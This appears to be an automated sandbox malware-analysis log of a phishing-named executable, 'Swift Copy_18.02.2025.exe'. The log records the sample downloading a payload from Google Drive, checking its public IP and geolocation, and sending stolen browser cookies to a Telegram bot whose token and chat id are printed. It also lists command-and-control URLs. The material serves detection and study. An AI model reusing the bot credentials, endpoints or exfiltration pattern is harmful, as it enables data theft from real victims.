            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49726 -> 104.21.32.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49730 -> 104.21.32.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49715 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2019/02/2025%20/%2006:03:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173633564&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51106829459fHost: api.telegram.orgContent-Length: 1279
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 18 Feb 2025 23:28:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Swift Copy_18.02.2025.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20a
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035ED7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7868872251:AAGgFQ9Bkl4sqj91n2vPKSuoyNLVzJTqODY/sendDocument?chat_id=8173
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/m
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000572C000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2945047953.000000000572E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.000000000572C000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2945047953.000000000572E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/4U
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=download
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3891789950.00000000056B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1cIKhuPssbL_NTukaBY4dUjwYIfLQaXdd&export=downloadbX
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DEB000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E16000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E82000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035E5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3917591113.0000000036DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Swift Copy_18.02.2025.exe, 00000006.00000003.2913237688.000000000576F000.00000004.00000020.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000003.2913038654.0000000005733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F8E000.00000004.00000800.00020000.00000000.sdmp, Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035EA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
            Source: Swift Copy_18.02.2025.exe, 00000006.00000002.3916059325.0000000035F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49731 version: TLS 1.2
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405295
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040331C
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,6_2_0040331C
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_00404AD20_2_00404AD2
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 0_2_004064F70_2_004064F7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_00404AD26_2_00404AD2
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_004064F76_2_004064F7
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AC4786_2_055AC478
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AC7486_2_055AC748
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AC1486_2_055AC148
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A71186_2_055A7118
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A53806_2_055A5380
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AD2886_2_055AD288
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A9DE06_2_055A9DE0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACCE86_2_055ACCE8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACFB86_2_055ACFB8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AE9886_2_055AE988
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A69B06_2_055A69B0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACA186_2_055ACA18
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AD5486_2_055AD548
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AC4686_2_055AC468
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AC7386_2_055AC738
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A53706_2_055A5370
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AD2786_2_055AD278
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACCD86_2_055ACCD8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACFA96_2_055ACFA9
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A3E096_2_055A3E09
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AE97A6_2_055AE97A
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055AF9746_2_055AF974
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A29EC6_2_055A29EC
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055ACA086_2_055ACA08
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_055A3AA16_2_055A3AA1
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E718506_2_38E71850
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7CDC06_2_38E7CDC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E751486_2_38E75148
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E72A906_2_38E72A90
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E796686_2_38E79668
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E71FA86_2_38E71FA8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E78CC06_2_38E78CC0
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F4C86_2_38E7F4C8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F4D86_2_38E7F4D8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E78CB16_2_38E78CB1
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F0806_2_38E7F080
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F0716_2_38E7F071
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E718416_2_38E71841
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E700406_2_38E70040
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7EC286_2_38E7EC28
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E700066_2_38E70006
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7EC186_2_38E7EC18
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7CDAF6_2_38E7CDAF
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F9216_2_38E7F921
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7F9306_2_38E7F930
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E79D386_2_38E79D38
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E751386_2_38E75138
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7DAC86_2_38E7DAC8
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E7DAB96_2_38E7DAB9
            Source: C:\Users\user\Desktop\Swift Copy_18.02.2025.exeCode function: 6_2_38E72A806_2_38E72A80
